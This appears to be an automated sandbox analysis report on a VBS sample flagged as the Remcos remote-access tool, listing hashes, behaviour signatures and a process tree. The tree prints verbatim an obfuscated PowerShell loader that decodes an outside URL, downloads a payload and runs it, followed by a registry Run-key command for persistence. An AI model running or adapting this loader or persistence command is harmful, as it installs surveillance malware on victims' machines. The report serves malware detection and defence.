Analysis

  • max time kernel
    67s
  • max time network
    72s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags
    arch:x64 arch:x86 image:win10v2004-20231215-en locale:en-us os:windows10-2004-x64 system
  • submitted
    15/02/2024, 05:40

General

  • Target

    d0fceb6bb0ed4dc5b8601e9560a291fe726958c774b0dc8647d1b7aec3f0c84c.vbs

  • Size

    93KB

  • MD5

    79094e9847a7bf1ffd13972fd7f4fe9f

  • SHA1

    98d0d34a146712d3399fcacf2369e11c4cd9c4ea

  • SHA256

    d0fceb6bb0ed4dc5b8601e9560a291fe726958c774b0dc8647d1b7aec3f0c84c

  • SHA512

    e0399f4fe05cdbc25dc193142d017d1161adb049cfd82dce26c03054f52825c43964b30c6c189cc293c85fb5f6da1092e62cfc736072294be62c23463a8386a9

  • SSDEEP

    1536:HJglU0P4wDaWxyADV76w2bnQReOlDaP5QrIWG2CSAe0i4rEOz+d:pglnvD1xyAp761kRe8DaP54G3eL4rvyd

Malware Config

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) 4 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 57 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d0fceb6bb0ed4dc5b8601e9560a291fe726958c774b0dc8647d1b7aec3f0c84c.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3716
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#bawsuntti Preterien Dkfjernon Slavehandl #>;$Ellagate=(cmd /c set /A 115^^0);Function Cyklis197 ([String]$Fakkelto){$Ellagate=[char][int]$Ellagate;$Udvidelser=$Ellagate+'ubstring';$Darghinho=8;$disbrainw=Elipser4($Fakkelto);For($Betjenbly=7; $Betjenbly -lt $disbrainw; $Betjenbly+=$Darghinho){$Blabb=$Fakkelto.$Udvidelser.Invoke($Betjenbly, 1);$Elipser=$Elipser+$Blabb;}$Elipser;}function Sikkerh ($Milj93){& ($Elipser01) ($Milj93);}function Elipser4 ([String]$Gosp){$ocaadrena1=$Gosp.Length-1;$ocaadrena1;}$Elipser02=Cyklis197 'HeptadeT KrybenrAbhorsoaIlluminn AntistsSkvtsglfMentioneTilskynr benfrirTjaldsbi PerukenSleevedgDansemu ';$Packt=Cyklis197 'Ddemandhtremolot SuprastRectangpmellemgsOvertag:Parader/ Flacke/ScaphogsLkkestrcOverheaaFrsemasiSprinklntilslutsLindbereOvertimt BotchioForttni.WeakytrcConcento SubsammMorallr.IbrugtabSkonnerrEbdomad/TilbagewManatinpRensnin-Ekspatra mennesdDesultomBorolibiKusamren Monome/ NashaacChromatyUndecoycHanefjelDelirioosolfangtDvrgkonh NeglecuCospons.FluidicpDansantfNarratemBilleda ';$Elipser01=Cyklis197 'Beredeli LeasineRepressxHandlin ';$Elipser00=Cyklis197 'Neathmo$LactonigKonfisklPolyestoAnmeldebInterioahovedstl Folkso:PengepooFaseindcBecausea FuzegeaIntrodud mezcalrFerskvae KameranEmbryopaForuren8Smuglma Endoper=Hexagyn HildegaSBldtvant AptalvaFedepserNoncoagtIsaianw-afformaBCryoplaiTilbjelt DispossBrdfabrT Holopar GrasseaHeartbrn LuteolsQuitchefNitrateeNegerborhilltop Finansb-VarigheSnedrakkoKologituShoplifrSphyrnicStvkonse Sllern Ecchbla$ BortpeP OzzieoaUndersecStenogakAfrasiatBoldfac Genspej-ElelfenDBrinishePropagasRivetndtkaffirsiElectranCalceusaCupelertcorbicui AlricgoFredskonKnaveri Pretes$OptjeneoTsubokoc Fastbaa JerntnaCardiecdUlykkesrRedialleSomitalnEmbatheaBegaudc2Aproned ';Sikkerh (Cyklis197 'autodkk$Autorisg herrerlNonopproPostnumb Cordiaa HentehlFilialn:NonprotoOvervrecFortyskaAmphithaSpeditidHormonorTetraloe 
CharcinRugegspadilatom2jugland=Scleren$GluedbaeGeneralnExpellevBrystsv:ElytrinaStenkulp Dupperp ConfirdAfledniaDiamondt samalqaInstruk ') ;Sikkerh (Cyklis197 'GeneralISkraldsmmillionpVsentlioWafthyprBandagetKulturc- HvisaaMOmbetrkoSlidtsodVrksteduStrandklheltalseLittera EsthacyBRenegotiModerkat plenums SpartlTkogechorUlvebloa AcinetnTakahessLeverinfVomitore GasterrJohnydo ') ;$ocaadrena2=$ocaadrena2+'\Taksati.kon' ;Sikkerh (Cyklis197 ' Comedy$DriftskgMedarbelPaabegyo LagerabUnscornaRadiiunl Pedant:Denimmeo SammencKlanglsaWhistlea HvidvidEksplosrVidaabne NonnatnetologiaJetesbe7 clappe=Agtsomm(RottefnTurostifeUbestvesWavelestHaandkl-SupermoP TestfiaBhmernetForhaanhPromode Svinghj$ GodmotoAcetomecErhverva TenebraAvissaldSindsstrOdorleseEikefifnTekstkraLsersmu2Ecandac)Pandehu ') ;while (-not $ocaadrena7) {Sikkerh (Cyklis197 ' GringeIFarvehafAristok Shampon(Salting$congessoDepravecDerommeaIndpakkaConubiudInsultpr SociomeVanskbnnUndergiaMontmor8 admira.VandprvJBygningoCatkinabStrykniSParsonotBrachygaKongerntBrunerieGatekee Manpack-KhevzureUnmuddlq Tauten Sidelin$UngorgeEAtionsplWoolliniVerdensp Clystes StartbeSpaniperSkraapa0 Smashe2Kartote)Oozoali Oblataa{ NvnermS RygepatFjernstaForhandrBookbintResumee-TantaraSResterelBlazereeLiturgieVrdimngpToxalbu Overtop1Blandin}Outparae UnderflHovednrspiggybae Rivalr{SigteevSTotemittSterlinaTsenesmrPatchwotStatefu- TypeabSTranslalStrattoeTidsskreForsikrpNivella Perspir1 Wacksy; DisjasSTabelopiMutinyskCognizekSlutbete SkrmharLuftbaah Nogged Broerun$VekselvEHarebotlPjokkedi MelanepBortledsMasticie FlokinrOpkobli0Fdevare0Paltril}Osophon ');Sikkerh (Cyklis197 'Yokcliq$OutswingOrwellslPhlogisoMantappb positiaVgrerthlAccosts:NonodoroTiredomcbrugtbaaTilbjelaUnsatisdsystemirPegasuse DivisinBenchwoaAdminis7Keglere=Blindga(BiotechTFlgestneOplsendsPretraitTumbleh-ShipmanP Cephala NetadrtMetacenhbrnesen Arkite$ExplanaoNotatiocSemificaCervicoa clintidOtiliefrScrollbe LuftfanGasovnea Python2Zephani)Anslags ') ;}Sikkerh (Cyklis197 
'Winnowe$KrftenlgForklarlJuanitaoTransanbRudimenaNormskolEkstrak:DeodoriNBellwineDelatindBilledsj Saviou1Stereot7Folketi4Bajonet Forveks=Diamond UmisforG havegae Autoset Frugtk-PustuleCCrissumoAltercan AftrkktSexageseBrandlonSyrligstGuidebo Trolse$Technolo CiselecScanninaKursnedaFaqlowedInevitarKursvrdeUnbandanagribusaTirrede2Skriben ');Sikkerh (Cyklis197 'Transce$SensommgEngrosblKnibtano BlgedabUnexhumaDekoratlUundvig:ScranneD FordrveSnowshoa LandflcPadesoyoIndubitnXylinde Rundesa=Frdiggr Wellcur[ touchlSMjesuniyTankesys IhjelptFangstbenskeformHairspr.PrinterCFnikerno RevisonViolentvCoefficeHalvlegr Friscot Enneas]Ripplet:Ensilag:MetrikkFProbattrBlaffero serailm YoghurBMattereaKnledsmsPishhoveAdvisor6studhor4 FalsumSOmhyggetUnshipsrVidvinkiStramtsn myoprogNdvrget( Grinag$ PreabuNMiskmaseBlystbeddiurnuljShamans1Pottosf7Apanage4Berteli)Villale ');Sikkerh (Cyklis197 ' Levuli$VaricocgUnisonalUnexpecoGutsybub PantalaStringclCobbies:InconelEcomputelKilocaliCradlerpdormitosForespeeSwissesrAchines2Indavle Preserv=Toxinea Devalue[DecapetSYmtertryProfounsIndkrvnt BruttoeTilspurmPathbre.SubantiT emboweeOtteaarxCentraltDepende.FarvemsEFallernnAgertidcObtempeoBurielsdDramatiiTodagesnManipulg Riglin]Anhnger:Sorings:afledteA FootraSTrallevCHessparIEmbarquISirupyk.OclocktG Vemodoe PuffedtPhonetiSSplotchtGevirscrDoctrini JohnsenGennemsgSubvers(Gavflab$SektionDGrammateTriboloaSnurpencExpireuoManiocan Proful)Cathept ');Sikkerh (Cyklis197 'ophnges$BogtrykgdunlinblEbonizeoSuccessbResonera Fejltil kuankl: JannsgE PumperlStrepsii SomedepRhythmisAmphigoe PartiorHjertes3Demokra=Skoalin$ReemigrEStewardlFisedesigulnarepProduktsQuadpleeSekunderSovietc2 produk.EurekafsSnippetuReprsenbDermatosAdelsmatAtomknurSammenbiVittussnMurstengDiffusi(skeyhel3 Fordyb0Mercypr9Prosely8Geograf8Abcerne6Begynde,Unallit2 Niases4Beatusp1Udmaler6Exorciz0Quiresh)Asylans ');Sikkerh $Elipser3;"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1512
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c set /A 115^^0
        3⤵
          PID:3724
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#bawsuntti Preterien Dkfjernon Slavehandl #>;$Ellagate=(cmd /c set /A 115^^0);Function Cyklis197 ([String]$Fakkelto){$Ellagate=[char][int]$Ellagate;$Udvidelser=$Ellagate+'ubstring';$Darghinho=8;$disbrainw=Elipser4($Fakkelto);For($Betjenbly=7; $Betjenbly -lt $disbrainw; $Betjenbly+=$Darghinho){$Blabb=$Fakkelto.$Udvidelser.Invoke($Betjenbly, 1);$Elipser=$Elipser+$Blabb;}$Elipser;}function Sikkerh ($Milj93){& ($Elipser01) ($Milj93);}function Elipser4 ([String]$Gosp){$ocaadrena1=$Gosp.Length-1;$ocaadrena1;}$Elipser02=Cyklis197 'HeptadeT KrybenrAbhorsoaIlluminn AntistsSkvtsglfMentioneTilskynr benfrirTjaldsbi PerukenSleevedgDansemu ';$Packt=Cyklis197 'Ddemandhtremolot SuprastRectangpmellemgsOvertag:Parader/ Flacke/ScaphogsLkkestrcOverheaaFrsemasiSprinklntilslutsLindbereOvertimt BotchioForttni.WeakytrcConcento SubsammMorallr.IbrugtabSkonnerrEbdomad/TilbagewManatinpRensnin-Ekspatra mennesdDesultomBorolibiKusamren Monome/ NashaacChromatyUndecoycHanefjelDelirioosolfangtDvrgkonh NeglecuCospons.FluidicpDansantfNarratemBilleda ';$Elipser01=Cyklis197 'Beredeli LeasineRepressxHandlin ';$Elipser00=Cyklis197 'Neathmo$LactonigKonfisklPolyestoAnmeldebInterioahovedstl Folkso:PengepooFaseindcBecausea FuzegeaIntrodud mezcalrFerskvae KameranEmbryopaForuren8Smuglma Endoper=Hexagyn HildegaSBldtvant AptalvaFedepserNoncoagtIsaianw-afformaBCryoplaiTilbjelt DispossBrdfabrT Holopar GrasseaHeartbrn LuteolsQuitchefNitrateeNegerborhilltop Finansb-VarigheSnedrakkoKologituShoplifrSphyrnicStvkonse Sllern Ecchbla$ BortpeP OzzieoaUndersecStenogakAfrasiatBoldfac Genspej-ElelfenDBrinishePropagasRivetndtkaffirsiElectranCalceusaCupelertcorbicui AlricgoFredskonKnaveri Pretes$OptjeneoTsubokoc Fastbaa JerntnaCardiecdUlykkesrRedialleSomitalnEmbatheaBegaudc2Aproned ';Sikkerh (Cyklis197 'autodkk$Autorisg herrerlNonopproPostnumb Cordiaa HentehlFilialn:NonprotoOvervrecFortyskaAmphithaSpeditidHormonorTetraloe 
CharcinRugegspadilatom2jugland=Scleren$GluedbaeGeneralnExpellevBrystsv:ElytrinaStenkulp Dupperp ConfirdAfledniaDiamondt samalqaInstruk ') ;Sikkerh (Cyklis197 'GeneralISkraldsmmillionpVsentlioWafthyprBandagetKulturc- HvisaaMOmbetrkoSlidtsodVrksteduStrandklheltalseLittera EsthacyBRenegotiModerkat plenums SpartlTkogechorUlvebloa AcinetnTakahessLeverinfVomitore GasterrJohnydo ') ;$ocaadrena2=$ocaadrena2+'\Taksati.kon' ;Sikkerh (Cyklis197 ' Comedy$DriftskgMedarbelPaabegyo LagerabUnscornaRadiiunl Pedant:Denimmeo SammencKlanglsaWhistlea HvidvidEksplosrVidaabne NonnatnetologiaJetesbe7 clappe=Agtsomm(RottefnTurostifeUbestvesWavelestHaandkl-SupermoP TestfiaBhmernetForhaanhPromode Svinghj$ GodmotoAcetomecErhverva TenebraAvissaldSindsstrOdorleseEikefifnTekstkraLsersmu2Ecandac)Pandehu ') ;while (-not $ocaadrena7) {Sikkerh (Cyklis197 ' GringeIFarvehafAristok Shampon(Salting$congessoDepravecDerommeaIndpakkaConubiudInsultpr SociomeVanskbnnUndergiaMontmor8 admira.VandprvJBygningoCatkinabStrykniSParsonotBrachygaKongerntBrunerieGatekee Manpack-KhevzureUnmuddlq Tauten Sidelin$UngorgeEAtionsplWoolliniVerdensp Clystes StartbeSpaniperSkraapa0 Smashe2Kartote)Oozoali Oblataa{ NvnermS RygepatFjernstaForhandrBookbintResumee-TantaraSResterelBlazereeLiturgieVrdimngpToxalbu Overtop1Blandin}Outparae UnderflHovednrspiggybae Rivalr{SigteevSTotemittSterlinaTsenesmrPatchwotStatefu- TypeabSTranslalStrattoeTidsskreForsikrpNivella Perspir1 Wacksy; DisjasSTabelopiMutinyskCognizekSlutbete SkrmharLuftbaah Nogged Broerun$VekselvEHarebotlPjokkedi MelanepBortledsMasticie FlokinrOpkobli0Fdevare0Paltril}Osophon ');Sikkerh (Cyklis197 'Yokcliq$OutswingOrwellslPhlogisoMantappb positiaVgrerthlAccosts:NonodoroTiredomcbrugtbaaTilbjelaUnsatisdsystemirPegasuse DivisinBenchwoaAdminis7Keglere=Blindga(BiotechTFlgestneOplsendsPretraitTumbleh-ShipmanP Cephala NetadrtMetacenhbrnesen Arkite$ExplanaoNotatiocSemificaCervicoa clintidOtiliefrScrollbe LuftfanGasovnea Python2Zephani)Anslags ') ;}Sikkerh (Cyklis197 
'Winnowe$KrftenlgForklarlJuanitaoTransanbRudimenaNormskolEkstrak:DeodoriNBellwineDelatindBilledsj Saviou1Stereot7Folketi4Bajonet Forveks=Diamond UmisforG havegae Autoset Frugtk-PustuleCCrissumoAltercan AftrkktSexageseBrandlonSyrligstGuidebo Trolse$Technolo CiselecScanninaKursnedaFaqlowedInevitarKursvrdeUnbandanagribusaTirrede2Skriben ');Sikkerh (Cyklis197 'Transce$SensommgEngrosblKnibtano BlgedabUnexhumaDekoratlUundvig:ScranneD FordrveSnowshoa LandflcPadesoyoIndubitnXylinde Rundesa=Frdiggr Wellcur[ touchlSMjesuniyTankesys IhjelptFangstbenskeformHairspr.PrinterCFnikerno RevisonViolentvCoefficeHalvlegr Friscot Enneas]Ripplet:Ensilag:MetrikkFProbattrBlaffero serailm YoghurBMattereaKnledsmsPishhoveAdvisor6studhor4 FalsumSOmhyggetUnshipsrVidvinkiStramtsn myoprogNdvrget( Grinag$ PreabuNMiskmaseBlystbeddiurnuljShamans1Pottosf7Apanage4Berteli)Villale ');Sikkerh (Cyklis197 ' Levuli$VaricocgUnisonalUnexpecoGutsybub PantalaStringclCobbies:InconelEcomputelKilocaliCradlerpdormitosForespeeSwissesrAchines2Indavle Preserv=Toxinea Devalue[DecapetSYmtertryProfounsIndkrvnt BruttoeTilspurmPathbre.SubantiT emboweeOtteaarxCentraltDepende.FarvemsEFallernnAgertidcObtempeoBurielsdDramatiiTodagesnManipulg Riglin]Anhnger:Sorings:afledteA FootraSTrallevCHessparIEmbarquISirupyk.OclocktG Vemodoe PuffedtPhonetiSSplotchtGevirscrDoctrini JohnsenGennemsgSubvers(Gavflab$SektionDGrammateTriboloaSnurpencExpireuoManiocan Proful)Cathept ');Sikkerh (Cyklis197 'ophnges$BogtrykgdunlinblEbonizeoSuccessbResonera Fejltil kuankl: JannsgE PumperlStrepsii SomedepRhythmisAmphigoe PartiorHjertes3Demokra=Skoalin$ReemigrEStewardlFisedesigulnarepProduktsQuadpleeSekunderSovietc2 produk.EurekafsSnippetuReprsenbDermatosAdelsmatAtomknurSammenbiVittussnMurstengDiffusi(skeyhel3 Fordyb0Mercypr9Prosely8Geograf8Abcerne6Begynde,Unallit2 Niases4Beatusp1Udmaler6Exorciz0Quiresh)Asylans ');Sikkerh $Elipser3;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3992
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c set /A 115^^0
            4⤵
              PID:2772
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
                PID:2984
              • C:\Program Files (x86)\windows mail\wab.exe
                "C:\Program Files (x86)\windows mail\wab.exe"
                4⤵
                  PID:4536
                • C:\Program Files (x86)\windows mail\wab.exe
                  "C:\Program Files (x86)\windows mail\wab.exe"
                  4⤵
                    PID:772
                  • C:\Program Files (x86)\windows mail\wab.exe
                    "C:\Program Files (x86)\windows mail\wab.exe"
                    4⤵
                      PID:2088
                    • C:\Program Files (x86)\windows mail\wab.exe
                      "C:\Program Files (x86)\windows mail\wab.exe"
                      4⤵
                        PID:1924
                      • C:\Program Files (x86)\windows mail\wab.exe
                        "C:\Program Files (x86)\windows mail\wab.exe"
                        4⤵
                          PID:492
                        • C:\Program Files (x86)\windows mail\wab.exe
                          "C:\Program Files (x86)\windows mail\wab.exe"
                          4⤵
                            PID:2040
                          • C:\Program Files (x86)\windows mail\wab.exe
                            "C:\Program Files (x86)\windows mail\wab.exe"
                            4⤵
                              PID:3660
                            • C:\Program Files (x86)\windows mail\wab.exe
                              "C:\Program Files (x86)\windows mail\wab.exe"
                              4⤵
                                PID:2728
                              • C:\Program Files (x86)\windows mail\wab.exe
                                "C:\Program Files (x86)\windows mail\wab.exe"
                                4⤵
                                  PID:4968
                                • C:\Program Files (x86)\windows mail\wab.exe
                                  "C:\Program Files (x86)\windows mail\wab.exe"
                                  4⤵
                                    PID:5024
                                  • C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
                                    "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
                                    4⤵
                                      PID:1348
                                    • C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
                                      "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
                                      4⤵
                                      • Suspicious use of NtCreateThreadExHideFromDebugger
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      • Suspicious use of WriteProcessMemory
                                      PID:3988
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "subthrill" /t REG_EXPAND_SZ /d "%Penci% -w 1 $Ench22=(Get-ItemProperty -Path 'HKCU:\Plupatriot\').Fynboe;%Penci% ($Ench22)"
                                        5⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:1520
                                        • C:\Windows\SysWOW64\reg.exe
                                          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "subthrill" /t REG_EXPAND_SZ /d "%Penci% -w 1 $Ench22=(Get-ItemProperty -Path 'HKCU:\Plupatriot\').Fynboe;%Penci% ($Ench22)"
                                          6⤵
                                          • Adds Run key to start application
                                          • Modifies registry key
                                          PID:548

Network

MITRE ATT&CK Enterprise v15

Downloads

                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nzvxg1er.q0k.ps1

                                      Filesize

                                      60B

                                      MD5

                                      d17fe0a3f47be24a6453e9ef58c94641

                                      SHA1

                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                      SHA256

                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                      SHA512

                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
